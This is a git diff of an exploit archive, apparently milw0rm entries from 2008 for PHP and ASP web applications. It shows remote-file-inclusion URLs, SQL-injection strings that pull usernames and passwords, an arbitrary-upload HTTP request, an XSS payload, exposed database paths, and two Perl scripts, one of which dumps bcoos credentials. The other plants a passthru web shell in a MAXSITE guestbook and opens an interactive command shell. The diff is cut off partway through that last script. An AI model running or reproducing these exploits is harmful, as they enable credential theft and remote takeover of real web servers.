@@ -1,62 +1,62 @@ -================================================================================================================= - - - [o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability - - Software : Broadcast Machine version 0.1 - Vendor : http://code.google.com/p/broadcastmachine/ - View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/ - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -================================================================================================================= - - - [o] Vulnerable file - - all file below is affected by "baseDir" parameter - - controllers/MySQLController.php - - controllers/SQLController.php - - controllers/SetupController.php - - controllers/VideoController.php - - controllers/ViewController.php - - - - [o] Exploit - - - http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode] - - http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode] - - http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode] - - http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode] - - http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode] - - -================================================================================================================= - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/blog/] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke - - GANYANG MALINGSIAL!!! 
[ http://malingsial.serverisdown.org/ ] - - -================================================================================================================= - -# milw0rm.com [2008-11-30] +================================================================================================================= + + + [o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability + + Software : Broadcast Machine version 0.1 + Vendor : http://code.google.com/p/broadcastmachine/ + View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/ + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +================================================================================================================= + + + [o] Vulnerable file + + all file below is affected by "baseDir" parameter + + controllers/MySQLController.php + + controllers/SQLController.php + + controllers/SetupController.php + + controllers/VideoController.php + + controllers/ViewController.php + + + + [o] Exploit + + + http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode] + + http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode] + + http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode] + + http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode] + + http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode] + + +================================================================================================================= + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/blog/] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke + + GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ] + + +================================================================================================================= + +# milw0rm.com [2008-11-30] 
diff --git a/platforms/php/webapps/7311.txt b/platforms/php/webapps/7311.txt index edde0b48a..13c6abeac 100755 --- a/platforms/php/webapps/7311.txt +++ b/platforms/php/webapps/7311.txt 
@@ -1,39 +1,39 @@ -------------------------------------------------------------------------- - -- JIKO FroM No-exploit.Com --- -------------------------------------------------------------------------- -# Author : jiko -# email : jalikom@hotmail.com -# Home : www.no-exploit.Com -# Script : z1exchange-->http://1scripts.net/scripts/z1exchange.zip - Proud To Be MoroCCaN -->> WwW.No-ExploiT.CoM , WwW.Exploiter5.CoM -Fkhatar L3chran wwlad darb wlidat l9issm wmansach L3chira -=========================[JAWAD Cha7ta 4 ever]=================== -# Exploit : - http://no-exploit.com - -http://no-exploit.com//z1exchange/edit.php?site=[sql] -http://no-exploit.com//z1exchange/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users-- - -DEMO: - -http://localhost/scripts/z1exchange/z1exchange/edit.php?site=-12 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- - -=========================[Thanks To Allah ]=================== - greetz : all my friend and all No-exploit members and - $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ -MizoZ $ leopard - all muslims - visit: www.no-exploit.Com - Visit: My-montada.Co.cc For your free Forum - -------------------------------------------------------------------------- - -- JIKO FroM No-exploit.Com --- -------------------------------------------------------------------------- -------== troops of Mohamed comming inchalah =----------------- -Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc -Raha nayda Nood :)Fuck Bigg Kbir Lkarcha Bo ta7cha stoon dyalibou7do hwa cha7ta -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] 
++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - -# milw0rm.com [2008-12-01] +------------------------------------------------------------------------- + -- JIKO FroM No-exploit.Com --- +------------------------------------------------------------------------- +# Author : jiko +# email : jalikom@hotmail.com +# Home : www.no-exploit.Com +# Script : z1exchange-->http://1scripts.net/scripts/z1exchange.zip + Proud To Be MoroCCaN -->> WwW.No-ExploiT.CoM , WwW.Exploiter5.CoM +Fkhatar L3chran wwlad darb wlidat l9issm wmansach L3chira +=========================[JAWAD Cha7ta 4 ever]=================== +# Exploit : + http://no-exploit.com + +http://no-exploit.com//z1exchange/edit.php?site=[sql] +http://no-exploit.com//z1exchange/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users-- + +DEMO: + +http://localhost/scripts/z1exchange/z1exchange/edit.php?site=-12 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- + +=========================[Thanks To Allah ]=================== + greetz : all my friend and all No-exploit members and + $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ +MizoZ $ leopard + all muslims + visit: www.no-exploit.Com + Visit: My-montada.Co.cc For your free Forum + +------------------------------------------------------------------------- + -- JIKO FroM No-exploit.Com --- +------------------------------------------------------------------------- +------== troops of Mohamed comming inchalah =----------------- +Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc +Raha nayda Nood :)Fuck Bigg Kbir Lkarcha Bo ta7cha stoon dyalibou7do hwa cha7ta +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] 
Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + +# milw0rm.com [2008-12-01] diff --git a/platforms/php/webapps/7312.txt b/platforms/php/webapps/7312.txt index 440445d89..c860247d4 100755 --- a/platforms/php/webapps/7312.txt +++ b/platforms/php/webapps/7312.txt 
@@ -1,115 +1,115 @@ -============================================================== - Andy's PHP Knowledgebase Arbitrary File Upload Vulnerability -============================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 1 December 2008 -SITE : cwh.citec.us - - -##################################################### -APPLICATION : Andy's PHP Knowledgebase -VERSION : 0.92.9 -DOWNLOAD : http://sourceforge.net/project/showfiles.php?group_id=113755 -##################################################### - ---- Arbitrary File Upload --- - -In saa.php page, you can submit an article and attachment file to wait for approval from admin. -Immediately after you submit the article and attachment file, the file has already been on the server without checking file type. -You can upload arbitary file through this form and the url to this file is in authors.php page. 
- --------- - POC --------- - -POST /cms/aphpkb/saa.php HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18 -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Keep-Alive: 300 -Connection: keep-alive -Referer: http://127.0.0.1/cms/aphpkb/saa.php?aid=2 -Cookie: module=table; PHPSESSID=b311c4f9b1f3ee0c071f33ffd3b3176f -Content-Type: multipart/form-data; boundary=---------------------------22955284022147 -Content-Length: 1080 ------------------------------22955284022147 -Content-Disposition: form-data; name="title" - -PoC Arbitrary File Upload ------------------------------22955284022147 -Content-Disposition: form-data; name="article" - -PoC Arbitrary File Upload ------------------------------22955284022147 -Content-Disposition: form-data; name="keywords" - -PoC Arbitrary File Upload ------------------------------22955284022147 -Content-Disposition: form-data; name="aid" - -2 ------------------------------22955284022147 -Content-Disposition: form-data; name="upload"; filename="info.php" -Content-Type: application/octet-stream - -<? 
phpinfo(); ?> ------------------------------22955284022147 -Content-Disposition: form-data; name="description" - -PHP File ------------------------------22955284022147 -Content-Disposition: form-data; name="aid" - -2 ------------------------------22955284022147 -Content-Disposition: form-data; name="a" - - ------------------------------22955284022147 -Content-Disposition: form-data; name="submit" - -Submit/Save ------------------------------22955284022147-- - - -HTTP/1.x 200 OK -Date: Mon, 01 Dec 2008 05:39:35 GMT -Server: Apache/2.2.8 (Win32) PHP/5.2.6 -X-Powered-By: PHP/5.2.6 -Expires: Thu, 19 Nov 1981 08:52:00 GMT -Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 -Pragma: no-cache -Content-Length: 4578 -Keep-Alive: timeout=5, max=100 -Connection: Keep-Alive -Content-Type: text/html - - ------------------------------------------------------------------------ - -Link for uploaded file is in http://[Target]/[aphpkb_path]/authors.php - - -####################################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - -# milw0rm.com [2008-12-01] +============================================================== + Andy's PHP Knowledgebase Arbitrary File Upload Vulnerability +============================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 1 December 2008 +SITE : cwh.citec.us + + +##################################################### +APPLICATION : Andy's PHP Knowledgebase +VERSION : 0.92.9 +DOWNLOAD : http://sourceforge.net/project/showfiles.php?group_id=113755 +##################################################### + +--- Arbitrary File Upload --- + +In saa.php page, you can submit an article and attachment file to wait for approval from admin. +Immediately after you submit the article and attachment file, the file has already been on the server without checking file type. +You can upload arbitary file through this form and the url to this file is in authors.php page. + +-------- + POC +-------- + +POST /cms/aphpkb/saa.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18 +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip,deflate +Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 +Keep-Alive: 300 +Connection: keep-alive +Referer: http://127.0.0.1/cms/aphpkb/saa.php?aid=2 +Cookie: module=table; PHPSESSID=b311c4f9b1f3ee0c071f33ffd3b3176f +Content-Type: multipart/form-data; boundary=---------------------------22955284022147 +Content-Length: 1080 +-----------------------------22955284022147 +Content-Disposition: form-data; name="title" + +PoC Arbitrary File Upload +-----------------------------22955284022147 +Content-Disposition: form-data; name="article" + +PoC Arbitrary File Upload +-----------------------------22955284022147 +Content-Disposition: form-data; name="keywords" + +PoC Arbitrary File Upload +-----------------------------22955284022147 +Content-Disposition: form-data; 
name="aid" + +2 +-----------------------------22955284022147 +Content-Disposition: form-data; name="upload"; filename="info.php" +Content-Type: application/octet-stream + +<? phpinfo(); ?> +-----------------------------22955284022147 +Content-Disposition: form-data; name="description" + +PHP File +-----------------------------22955284022147 +Content-Disposition: form-data; name="aid" + +2 +-----------------------------22955284022147 +Content-Disposition: form-data; name="a" + + +-----------------------------22955284022147 +Content-Disposition: form-data; name="submit" + +Submit/Save +-----------------------------22955284022147-- + + +HTTP/1.x 200 OK +Date: Mon, 01 Dec 2008 05:39:35 GMT +Server: Apache/2.2.8 (Win32) PHP/5.2.6 +X-Powered-By: PHP/5.2.6 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 4578 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html + + +----------------------------------------------------------------------- + +Link for uploaded file is in http://[Target]/[aphpkb_path]/authors.php + + +####################################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + +# milw0rm.com [2008-12-01] diff --git a/platforms/php/webapps/7315.txt b/platforms/php/webapps/7315.txt index c5d5f4745..290c2ae26 100755 --- a/platforms/php/webapps/7315.txt +++ b/platforms/php/webapps/7315.txt 
@@ -1,20 +1,20 @@ -Description: -************* ***************** ************* ******************* -E.Z. Poll <= v.2 script Remote SQL injection Exploit -discovered by t0fx aka xtof69 -vendor : E.Z. - - -************* ***************** ************* ******************* - -vulnerable page : http://www.site.com/admin/login.asp - -exploit : - -Username : 'or' '=' -Password : 'or' '=' - -Add, modify user : -/admin/admin-users.asp - -# milw0rm.com [2008-12-01] +Description: +************* ***************** ************* ******************* +E.Z. Poll <= v.2 script Remote SQL injection Exploit +discovered by t0fx aka xtof69 +vendor : E.Z. + + +************* ***************** ************* ******************* + +vulnerable page : http://www.site.com/admin/login.asp + +exploit : + +Username : 'or' '=' +Password : 'or' '=' + +Add, modify user : +/admin/admin-users.asp + +# milw0rm.com [2008-12-01] diff --git a/platforms/php/webapps/7317.pl b/platforms/php/webapps/7317.pl index 18a882048..0a94f01d3 100755 --- a/platforms/php/webapps/7317.pl +++ b/platforms/php/webapps/7317.pl 
@@ -1,95 +1,95 @@
-#!/usr/bin/perl -w
-#============================================
-# bcoos 1.0.13 Remote SQL Injection Exploit
-#============================================
-#
-# ,--^----------,--------,-----,-------^--,
-# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
-# `+---------------------------^----------|
-# `\_,-------, _________________________|
-# / XXXXXX /`| /
-# / XXXXXX / `\ /
-# / XXXXXX /\______(
-# / XXXXXX /
-# / XXXXXX /
-# (________(
-# `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 1 December 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : bcoos
-#VERSION : 1.0.13 (Prior versions also maybe affected)
-#VENDOR : http://www.bcoos.net/
-#DOWNLOAD : http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
-######################################################
-#
-#Note: magic_quotes_gpc = off
-#Addresses Modules Must be Installed
-#
-#######################################################################################
-#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-
-use LWP::UserAgent;
-use HTTP::Request;
-
-if ($#ARGV+1 != 2)
-{
- print "\n==============================================\n";
- print " Bcoos Remote SQL Injection Exploit \n";
- print " \n";
- print " Discovered By CWH Underground \n";
- print "==============================================\n";
- print " \n";
- print " ,--^----------,--------,-----,-------^--, \n";
- print " | ||||||||| `--------' | O \n";
- print " `+---------------------------^----------| \n";
- print " `\_,-------, _________________________| \n";
- print " / XXXXXX /`| / \n";
- print " / XXXXXX / `\ / \n";
- print " / XXXXXX /\______( \n";
- print " / XXXXXX / \n";
- print " / XXXXXX / .. CWH Underground Hacking Team .. 
\n";
- print " (________( \n";
- print " `------' \n";
- print " \n";
- print "Usage : ./xpl.pl <Target> <Data Limit>\n";
- print "Example: ./xpl.pl http://www.target.com/bcoos 10\n";
- exit();
-}
-
-$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
-$number = $ARGV[1];
-
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
-print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print "\n[+]Dump Username and Password\n";
-
-for ($start=0;$start<$number;$start++) {
-
-$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$req = HTTP::Request->new(GET => $target."/modules/adresses/viewcat.php?cid=1%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,uname,0x3a3a,pass,0x3a3a3a)%20from%20bcoos_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
-$res = $xpl->request($req);
-$info = $res->content;
-$count=$start+1;
-
-if ($info =~ /:::(.+):::/)
-{
-$dump=$1;
-($username,$password)= split('::',$dump);
-printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
-}
-else {
- print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
- exit;
-}
-}
-
-# milw0rm.com [2008-12-01]
+#!/usr/bin/perl -w
+#============================================
+# bcoos 1.0.13 Remote SQL Injection Exploit
+#============================================
+#
+# ,--^----------,--------,-----,-------^--,
+# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+# `+---------------------------^----------|
+# `\_,-------, _________________________|
+# / XXXXXX /`| /
+# / XXXXXX / `\ /
+# / XXXXXX /\______(
+# / XXXXXX /
+# / XXXXXX /
+# (________(
+# `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 1 December 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : bcoos
+#VERSION : 1.0.13 (Prior versions also maybe affected)
+#VENDOR : http://www.bcoos.net/
+#DOWNLOAD : http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
+######################################################
+#
+#Note: magic_quotes_gpc = off
+#Addresses Modules Must be Installed
+#
+#######################################################################################
+#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+
+use LWP::UserAgent;
+use HTTP::Request;
+
+if ($#ARGV+1 != 2)
+{
+ print "\n==============================================\n";
+ print " Bcoos Remote SQL Injection Exploit \n";
+ print " \n";
+ print " Discovered By CWH Underground \n";
+ print "==============================================\n";
+ print " \n";
+ print " ,--^----------,--------,-----,-------^--, \n";
+ print " | ||||||||| `--------' | O \n";
+ print " `+---------------------------^----------| \n";
+ print " `\_,-------, _________________________| \n";
+ print " / XXXXXX /`| / \n";
+ print " / XXXXXX / `\ / \n";
+ print " / XXXXXX /\______( \n";
+ print " / XXXXXX / \n";
+ print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
+ print " (________( \n";
+ print " `------' \n";
+ print " \n";
+ print "Usage : ./xpl.pl <Target> <Data Limit>\n";
+ print "Example: ./xpl.pl http://www.target.com/bcoos 10\n";
+ exit();
+}
+
+$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . 
$ARGV[0];
+$number = $ARGV[1];
+
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
+print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+print "\n[+]Dump Username and Password\n";
+
+for ($start=0;$start<$number;$start++) {
+
+$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$req = HTTP::Request->new(GET => $target."/modules/adresses/viewcat.php?cid=1%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,uname,0x3a3a,pass,0x3a3a3a)%20from%20bcoos_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
+$res = $xpl->request($req);
+$info = $res->content;
+$count=$start+1;
+
+if ($info =~ /:::(.+):::/)
+{
+$dump=$1;
+($username,$password)= split('::',$dump);
+printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
+}
+else {
+ print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
+ exit;
+}
+}
+
+# milw0rm.com [2008-12-01]
diff --git a/platforms/php/webapps/7318.txt b/platforms/php/webapps/7318.txt
index 7773835ee..8c26b0cb4 100755
--- a/platforms/php/webapps/7318.txt
+++ b/platforms/php/webapps/7318.txt
@@ -1,46 +1,46 @@
-###########################################################################
-#-----------------------------OffensiveTrack------------------------------#
-###########################################################################
-
-
----------------------------- Tunisia Muslim ------------------------------
-
-
-
-
-#found by : OffensiveTrack
-#Author : AlpHaNiX
-#website : www.offensivetrack.org
-
-#contact : AlpHa[AT]HACKER[DOT]BZ
-
-
-
-
-###########################################################################
-
-
-
-#script : PacPoll
-#version : v4
-#download : http://pacosdrivers.com/asp/poll/count.asp?u_link=dload.asp
-
-
-
-
-#Exploit :
-http://target.com/script/poll.mdb
-http://target.com/script/poll97.mdb
-
-#live example :
-http://pacosdrivers.com/asp/poll/poll.mdb
-
-
-
-
-
-#greetz : Zigma , Serh , Simo-Soft & dear Slax
-
-###########################################################################
-
-# milw0rm.com [2008-12-01]
+###########################################################################
+#-----------------------------OffensiveTrack------------------------------#
+###########################################################################
+
+
+---------------------------- Tunisia Muslim ------------------------------
+
+
+
+
+#found by : OffensiveTrack
+#Author : AlpHaNiX
+#website : www.offensivetrack.org
+
+#contact : AlpHa[AT]HACKER[DOT]BZ
+
+
+
+
+###########################################################################
+
+
+
+#script : PacPoll
+#version : v4
+#download : http://pacosdrivers.com/asp/poll/count.asp?u_link=dload.asp
+
+
+
+
+#Exploit :
+http://target.com/script/poll.mdb
+http://target.com/script/poll97.mdb
+
+#live example :
+http://pacosdrivers.com/asp/poll/poll.mdb
+
+
+
+
+
+#greetz : Zigma , Serh , Simo-Soft & dear Slax
+
+###########################################################################
+
+# milw0rm.com [2008-12-01]
diff --git a/platforms/php/webapps/7319.txt b/platforms/php/webapps/7319.txt
index 0c3f09020..600802986 100755
--- a/platforms/php/webapps/7319.txt
+++ b/platforms/php/webapps/7319.txt
@@ -1,21 +1,21 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Ocean12 Mailing List Manager Gold
-Vendor : http://ocean12tech.com/products/o12mailgold
-Author : Pouya_Server , Pouya.s3rver@Gmail.com
-Vulnerability : (DD,SQL,XSS)
----------------------------------------------------------
-#########################################################
-[DD]:
-http://site.com/[Path]/o12mail.mdb
-[SQL]:
-http://site.com/[Path]/s_edit.asp?email=[SQL]
-http://site.com/[Path]/default.asp?Page=2&Email='[SQL]
-[XSS]:
-http://site.com/[Path]/default.asp?Error=Pouya_Server&Name=&Email=Pouya.s3rver@gmail.com"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
-
---------------------------------
-Victem :
-http://ocean12tech.com/products/o12mailgold/demo
-
-# milw0rm.com [2008-12-02]
+#########################################################
+--------------------------------------------------------
+Portal Name: Ocean12 Mailing List Manager Gold
+Vendor : http://ocean12tech.com/products/o12mailgold
+Author : Pouya_Server , Pouya.s3rver@Gmail.com
+Vulnerability : (DD,SQL,XSS)
+--------------------------------------------------------
+#########################################################
+[DD]:
+http://site.com/[Path]/o12mail.mdb
+[SQL]:
+http://site.com/[Path]/s_edit.asp?email=[SQL]
+http://site.com/[Path]/default.asp?Page=2&Email='[SQL]
+[XSS]:
+http://site.com/[Path]/default.asp?Error=Pouya_Server&Name=&Email=Pouya.s3rver@gmail.com"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
+
+--------------------------------
+Victem :
+http://ocean12tech.com/products/o12mailgold/demo
+
+# milw0rm.com [2008-12-02]
diff --git a/platforms/php/webapps/7322.pl b/platforms/php/webapps/7322.pl
index a5daa09e0..aa2aaf840 100755
--- a/platforms/php/webapps/7322.pl
+++ b/platforms/php/webapps/7322.pl
@@ -1,118 +1,118 @@
-#!/usr/bin/perl
-#==================================================================
-# CMS MAXSITE Component Guestbook Remote Command Execution Exploit
-#==================================================================
-#
-# ,--^----------,--------,-----,-------^--,
-# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
-# `+---------------------------^----------|
-# `\_,-------, _________________________|
-# / XXXXXX /`| /
-# / XXXXXX / `\ /
-# / XXXXXX /\______(
-# / XXXXXX /
-# / XXXXXX /
-# (________(
-# `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 2 December 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################################
-#APPLICATION : CMS MAXSITE Component Guestbook
-#COMPONENT : Guestbook
-#DOWNLOAD : http://maxsite.geniuscyber.com/download/Ex-guestbook.rar
-#####################################################################
-#
-#
-#####################################################################
-# Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
-# Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-use LWP;
-use HTTP::Request;
-
-my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
-
-print "\n==================================================\n";
-print " CMS MAXSITE Component Guestbook RCE Exploit \n";
-print " \n";
-print " Discovered By CWH Underground \n";
-print "==================================================\n";
-print " \n";
-print " ,--^----------,--------,-----,-------^--, \n";
-print " | ||||||||| `--------' | O \n";
-print " `+---------------------------^----------| \n";
-print " `\_,-------, _________________________| \n";
-print " / XXXXXX /`| / \n";
-print " / XXXXXX / `\ / \n";
-print " / XXXXXX /\______( \n";
-print " / XXXXXX / \n";
-print " / XXXXXX / .. CWH Underground Hacking Team .. 
\n";
-print " (________( \n";
-print " `------' \n";
-print " \n";
-
-if ($#ARGV != 0)
-{
- print "Usage: ./xpl.pl <URL to index page>\n";
- print "Ex. ./xpl.pl http://www.target.com/maxsite/index.php\n";
- exit();
-}
-
-$index = $ARGV[0];
-$upload_url = $index."?name=guestbook&file=message";
-
-print "\n[+] Trying to Inject the Code...\n";
-
-$ua = LWP::UserAgent->new ();
-$post = HTTP::Request->new (POST => $upload_url);
-$post->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
-$post->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
-$post->header (Accept_Language => 'en-us,en;q=0.5');
-$post->header (Content_Type => 'application/x-www-form-urlencoded');
-$post->content ('name=CWH&aim=CWH&email=CWH&site=http%3A%2F%2Fcitec.us&message=%3C%3Fphp+%0D%0Aif%28get_magic_quotes_gpc%28%29%29%0D%0A%7B+%0D%0A%09%24_GET%5Bcmd%5D%3Dstripslashes%28%24_GET%5Bcmd%5D%29%3B%0D%0A%7D+%0D%0Aecho+%28%22%23%23%25%24%24%25%23%23%22%29%3B%0D%0Apassthru%28%24_GET%5Bcmd%5D%29%3B+%0D%0Aecho+%28%22%23%23%25%24%24%25%23%23%22%29%3B%0D%0A%3F%3E&submitButtonName=Submit');
-
-$response = $ua->request ($post);
-
-if ($response->code ne 200) {
- print "\nRCE Exploit Failed\n";
- exit();
-}
-
-print "\nSuccessfully Inject Code !!!\n\n";
-print "[cwh-shell]# ";
-chomp ($cmd = <STDIN>);
-
-while ($cmd ne "exit") {
-
-
- $url = $index."?name=guestbook&cmd=".$cmd;
-
- $req = HTTP::Request->new (GET => $url);
- $req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
- $req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
- $req->header (Accept_Language => 'en-us,en;q=0.5');
-
-
- $response = $ua->request ($req);
- $content = $response->content;
-
- if ($content !~ /\#\#%\$\$%\#\#/) {
- print ("Exploit Failed\n");
- 
exit();
- }
-
- while ($content =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg) {
- print $1;
- }
-
- print "\n[cwh-shell]# ";
- chomp ($cmd = <STDIN>);
-
-}
-
-# milw0rm.com [2008-12-02]
+#!/usr/bin/perl
+#==================================================================
+# CMS MAXSITE Component Guestbook Remote Command Execution Exploit
+#==================================================================
+#
+# ,--^----------,--------,-----,-------^--,
+# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
+# `+---------------------------^----------|
+# `\_,-------, _________________________|
+# / XXXXXX /`| /
+# / XXXXXX / `\ /
+# / XXXXXX /\______(
+# / XXXXXX /
+# / XXXXXX /
+# (________(
+# `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 2 December 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################################
+#APPLICATION : CMS MAXSITE Component Guestbook
+#COMPONENT : Guestbook
+#DOWNLOAD : http://maxsite.geniuscyber.com/download/Ex-guestbook.rar
+#####################################################################
+#
+#
+#####################################################################
+# Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
+# Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+use LWP;
+use HTTP::Request;
+
+my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
+
+print "\n==================================================\n";
+print " CMS MAXSITE Component Guestbook RCE Exploit \n";
+print " \n";
+print " Discovered By CWH Underground \n";
+print "==================================================\n";
+print " \n";
+print " ,--^----------,--------,-----,-------^--, \n";
+print " | ||||||||| `--------' | O \n";
+print " `+---------------------------^----------| \n";
+print " `\_,-------, _________________________| \n";
+print " / XXXXXX /`| / \n";
+print " / XXXXXX / `\ / \n";
+print " / XXXXXX /\______( \n";
